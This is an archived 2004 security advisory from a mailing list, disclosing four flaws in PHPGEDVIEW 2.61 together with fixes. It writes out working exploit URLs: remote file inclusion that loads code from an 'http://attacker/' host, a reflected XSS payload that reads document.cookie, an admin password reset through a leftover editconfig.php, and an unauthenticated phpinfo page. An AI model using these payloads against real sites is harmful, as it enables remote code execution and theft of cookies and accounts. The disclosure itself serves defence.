|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Vuln in PHPGEDVIEW 2.61 Multi-Problem
From: Vietnamese Security Group (security
security.com.vn)
Date: Tue Jan 06 2004 - 00:19:55 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Tittle : Vuln in PHPGEDVIEW 2.61
Lang : PHP
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem
Introduction :
PHPGEDVIEW is program read projects GEDCOM file ( default html ) .
Bug :
1) Php code injection :
Rick : Hight
- Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php
In authentication_index.php file : at line 33 :
require $PGV_BASE_DIRECTORY."authenticate.php";
In functions.php file : at line 35 :
require($PGV_BASE_DIRECTORY."functions_print.php");
In config_gedcom.php file : at line 115 :
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
require($THEME_DIR."theme.php");
Exploit :
http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/
Script named authenticate.php put in http://attacker/ ( or functions_print.php , theme.php put in folder /themes/standard /
FIX : add firt line files have been vuln : Require (config.php);
2) Config again :
rick: Medium
If you not deleted editconfig.php file after install then attacker can reinstall and change password administrator .
Link : http://target/phpgedview_folder/editconfig.php
fix : Delete editconfig.php file
3) XSS :
Rick : medium
Exploit :
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>
fix :
Find :
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; size="20" ?>" /></td></tr>
replace with :
<input type="text" name="firstname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="" /></td></tr>
4) Show info server :
rick : low
I can show info server
Link: http://target/phpgedview_folder/admin.php?action=phpinfo
fix :
Find :
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
replace with :
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
=======================================================================
Windak - Vietnamese Security Group
www.security.com.vn
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]